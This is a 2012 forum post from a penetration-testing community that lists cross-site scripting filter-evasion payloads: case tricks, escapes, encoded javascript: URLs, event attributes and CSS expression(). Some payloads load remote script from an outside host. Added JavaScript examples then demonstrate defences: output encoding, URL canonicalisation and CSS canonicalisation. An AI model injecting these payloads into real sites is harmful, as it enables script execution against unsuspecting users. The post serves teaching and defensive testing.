中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Introduction to Cross Site Scripting (XSS) attack techniques

Author: admin    Time: 2012-12-31 09:59
1. Vary the letter case

    <sCript>alert('d')</scRipT>

2. Add extra characters to get past a regular-expression check

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different file extension instead of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example (contents of xss.css):

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

   (The post embeds the raw control characters, which do not survive copying; they are shown here as <TAB> and <LF>. In HTML source they can equally be written as the character references &#x09; and &#x0A;, which the browser decodes inside the attribute value and then ignores when it parses the URL scheme.)

    <img src="jav<TAB>ascr<TAB>ipt:alert('XSS3')">        -> tab

    <img src="jav<LF>ascr<LF>ipt:alert('XSS3')">          -> new line

    <IMG SRC="jav<TAB or LF>ascript:alert('XSS');">

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" terminator may also be dropped)

   (The forum software has decoded the character references in the encoded payloads, so each encoded line below now displays identically to its decoded source.)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in HTML tag event attributes

    <body onload="alert('onload')">

        Event attributes that take script: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code inside an SWF file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and let the browser reassemble it

    <XML ID=I><X><C>
    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
    </C></X>
    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

    <HTML><BODY>
    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
    <?import namespace="t" implementation="#default#time2">
    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">
    </BODY></HTML>

13. Write a cookie via META

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. javascript: in src, href and url()

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

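Added example, not code from the post above: the tag-blocklist filter that sections 1, 2 and 5 are written to slip past, run against those three payloads, beside the output encoding that makes such variants irrelevant. The filter functions, the payload array and the `containsScriptTag` check are this example's own constructions; `t.js` is the post's placeholder script name.

```javascript
// Constructed filter of the kind the post's payloads target: pair "<" with the
// next ">" and drop the tag when the first word between them is exactly "script".
function naiveScriptFilter(html) {
  return html.replace(/<([^>]*)>/g, (tag, inner) => {
    const name = inner.trim().split(/\s+/)[0];
    return name === 'script' ? '' : tag;
  });
}

// The same filter after the obvious patch: compare case-insensitively.
function naiveScriptFilterCI(html) {
  return html.replace(/<([^>]*)>/g, (tag, inner) => {
    const name = inner.trim().split(/\s+/)[0].toLowerCase();
    return name === 'script' ? '' : tag;
  });
}

// The fix that does not depend on guessing variants: encode the characters that
// can change the HTML parse, so untrusted text is only ever text. This covers
// HTML text and quoted attribute values; URL-valued attributes such as src and
// href additionally need a scheme allowlist.
function encodeForHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Payloads copied from the post (sections 1, 2 and 5).
const PAYLOADS = [
  "<sCript>alert('d')</scRipT>",        // 1: mixed case
  "<<script>alert('c')//<</script>",     // 2: extra "<", so the bracket pair reads "<script"
  '<SCRIPT/SRC="t.js"></SCRIPT>',        // 5: "/" instead of whitespace before the attribute
];

// Would the HTML parser still see an opening script tag in the filtered output?
// The parser accepts whitespace, "/" or ">" right after the tag name, in any case.
function containsScriptTag(html) {
  return /<script[\s\/>]/i.test(html);
}

// Run every payload through a filter and return the ones that survive it.
function survivors(filter) {
  return PAYLOADS.filter((p) => containsScriptTag(filter(p)));
}

console.log('case-sensitive filter lets through  :', survivors(naiveScriptFilter).length, 'of', PAYLOADS.length);
console.log('case-insensitive filter lets through:', survivors(naiveScriptFilterCI).length, 'of', PAYLOADS.length);
console.log('output encoding lets through        :', survivors(encodeForHtml).length, 'of', PAYLOADS.length);
```

The case fix blocks only the first payload; the second still passes because the bracket pair contains `<script`, not `script`, and the third because `SCRIPT/SRC="t.js"` is one word to the filter but a tag name plus attribute to the browser. Encoding leaves no `<` at all, so there is nothing left to vary.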

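Added example, not code from the post above: canonicalising a URL-valued attribute before deciding whether its scheme is acceptable. The tab/newline payloads of section 6, the hex-encoded payloads of section 8 and the `javascript:` URLs of section 14 all target filters that test the raw attribute string. `toNumericRefs` reproduces the section 8 encoding (with and without the `;` terminator), and the allowlist, function names and sample URLs are this example's own choices. (Modern browsers no longer execute `javascript:` in `img src`, but the same canonicalisation applies to `href`, `iframe src` and `url()`.)

```javascript
// Rewrite every character as an HTML numeric character reference, the encoding
// section 8 uses. hex=true gives &#x6A; instead of &#106;; semicolon=false drops
// the terminator, which HTML still decodes.
function toNumericRefs(text, { hex = false, semicolon = true } = {}) {
  let out = '';
  for (const ch of text) {
    const cp = ch.codePointAt(0);
    out += hex ? '&#x' + cp.toString(16).toUpperCase() : '&#' + cp;
    if (semicolon) out += ';';
  }
  return out;
}

// Decode numeric character references as an attribute value is decoded:
// decimal or hex, leading zeros allowed, semicolon optional.
function decodeNumericRefs(text) {
  return text.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (ref, num) => {
    const cp = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return cp > 0x10ffff ? ref : String.fromCodePoint(cp);
  });
}

// The check the post's payloads are built to get past: inspect the raw string only.
function naiveUrlIsSafe(raw) {
  return !/^javascript:/i.test(raw);
}

// Canonical form for scheme matching. Browsers remove ASCII tab, LF and CR from
// anywhere in a URL and trim leading/trailing C0 controls and spaces before
// parsing it, so do the same here after decoding the references.
function canonicalizeUrl(raw) {
  return decodeNumericRefs(raw)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
}

// Allowlist (this example's choice); any other scheme is rejected.
const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

function urlIsSafe(raw) {
  const url = canonicalizeUrl(raw);
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  if (!m) return true;                       // no scheme: a relative URL
  return SAFE_SCHEMES.has(m[1].toLowerCase());
}

// Constructed inputs: the first four are the post's payloads or encodings of them.
const URLS = [
  "jav\tascript:alert('XSS3')",                                              // section 6, raw tab
  "jav&#x0A;ascript:alert('XSS')",                                           // section 6, newline as a reference
  toNumericRefs("javascript:alert('abc')"),                                  // section 8, &#106;&#97;...
  toNumericRefs("javascript:alert('abc')", { hex: true, semicolon: false }), // section 8, &#x6A&#x61...
  " javascript:alert(1)",                                                    // leading space
  'https://example.com/page',
  '/relative/path',
];

// Compare the raw-string check with the canonicalising one for every sample.
function compare() {
  return URLS.map((u) => ({ url: u, naive: naiveUrlIsSafe(u), canonical: urlIsSafe(u) }));
}

for (const row of compare()) console.log(row.naive ? 'naive: allow ' : 'naive: block ', row.canonical ? 'canonical: allow ' : 'canonical: block ', JSON.stringify(row.url));
```

Every `javascript:` variant passes the raw check and fails the canonical one. The order matters: decode references first, then strip the control characters, because a reference such as `&#x09;` only becomes a tab after decoding.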

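Added example, not code from the post above: a string-aware CSS canonicaliser for the section 7 payloads (and the `url(javascript:` and `@import` forms of sections 4 and 14). They hide `expression(`, `javascript:` and `@import` behind CSS backslash escapes and comments; a filter that inspects the raw attribute misses them, and a filter that strips `/* */` naively is fooled by the `"*//*"` string in the last payload, which opens a fake comment that swallows the real `expression` from the stripper's point of view while the browser's tokenizer keeps the string intact. `expression()` only ever ran in Internet Explorer, but the canonicalise-then-check principle applies to any CSS blocklist. Function and constant names are this example's own; the last two samples are constructed.

```javascript
// Resolve CSS escapes and remove comments the way the CSS tokenizer does:
// "\" + 1-6 hex digits (+ one optional whitespace) is a code point, "\" + any
// other character is that character, and "/*" inside a quoted string is text,
// not a comment. Whitespace is then collapsed and the result lowercased.
function canonicalizeCss(css) {
  let out = '';
  let quote = null;                  // delimiter of the string being read, or null
  let i = 0;
  while (i < css.length) {
    const c = css[i];
    if (c === '\\' && i + 1 < css.length) {
      const next = css[i + 1];
      if (next === '\n' || next === '\r' || next === '\f') { i += 2; continue; } // escaped newline: dropped
      const hex = /^[0-9a-f]{1,6}/i.exec(css.slice(i + 1, i + 7));
      if (hex) {
        const cp = parseInt(hex[0], 16);
        const invalid = cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
        out += invalid ? '\uFFFD' : String.fromCodePoint(cp);
        i += 1 + hex[0].length;
        if (i < css.length && /[ \t\n\r\f]/.test(css[i])) i += 1;   // one whitespace ends a hex escape
      } else {
        out += next;
        i += 2;
      }
    } else if (quote !== null) {
      out += c;
      if (c === quote || c === '\n') quote = null;   // closing quote, or a bad string ended by a newline
      i += 1;
    } else if (c === '"' || c === "'") {
      quote = c;
      out += c;
      i += 1;
    } else if (c === '/' && css[i + 1] === '*') {
      const end = css.indexOf('*/', i + 2);
      i = end === -1 ? css.length : end + 2;         // unterminated comment runs to the end
    } else {
      out += c;
      i += 1;
    }
  }
  return out.replace(/\s+/g, ' ').toLowerCase();
}

// Constructs to refuse after canonicalisation: the three the post's payloads use.
const CSS_BLOCKLIST = [/expression\s*\(/, /javascript\s*:/, /@import/];

function cssLooksDangerous(css) {
  const canonical = canonicalizeCss(css);
  return CSS_BLOCKLIST.some((re) => re.test(canonical));
}

// Payloads from section 7 of the post (backslashes doubled for the JS literal),
// one constructed hex-escape variant, and one constructed benign declaration.
const CSS_SAMPLES = [
  "@im\\port'\\ja\\vasc\\ript:alert(\"XSS32\")';",
  'xss:expre\\ssion(alert("XSS33"))',
  "xss:expr/*anyword*/ession(alert('sss'))",
  "width: expre\\ssi\\on(alert('XSS31'));",
  'no\\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))',
  'width: \\000065xpression(alert(1))',            // constructed: 6-digit hex escape for "e"
  'color: red; background: url("/img/a.png")',     // constructed: benign
];

// Canonical form and verdict for every sample.
function report() {
  return CSS_SAMPLES.map((css) => ({ css, canonical: canonicalizeCss(css), dangerous: cssLooksDangerous(css) }));
}

for (const row of report()) console.log(row.dangerous ? 'BLOCK ' : 'allow ', row.canonical);
```

Resolving escapes and comments in one pass, with string state, is what makes the `"*//*"` sample come out as `xss:expression(...)` rather than as the harmless-looking fragment a two-stage strip-comments-then-unescape filter would see.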


Welcome to 中国网络渗透测试联盟 (https://cobjon.com/)    Powered by Discuz! X3.2